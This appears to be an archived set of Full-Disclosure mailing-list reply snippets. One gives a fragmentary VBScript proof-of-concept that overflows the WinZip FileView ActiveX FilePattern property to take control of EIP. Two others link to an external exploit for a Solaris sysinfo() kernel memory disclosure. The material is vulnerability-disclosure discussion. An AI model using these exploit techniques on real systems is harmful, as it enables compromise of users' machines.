Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below; HTML HEAD TITLE/TITLE /HEAD BODY SCRIPT LANGUAGE=VBScript !-- Sub WZFILEVIEW_OnAfterItemAdd(Item) WZFILEVIEW.FilePattern = SMASHTHESTACKHERE end sub -- /SCRIPT OBJECT

Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability

Exploit has been attached as problems with site hosting over weekend. --- Micheal Turner [EMAIL PROTECTED] wrote: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c --- labs-no-reply [EMAIL PROTECTED] wrote: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure

Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability

http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c --- labs-no-reply [EMAIL PROTECTED] wrote: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability iDefense Security Advisory 07.20.06 http://www.idefense.com/application/poi/display?type=vulnerabilities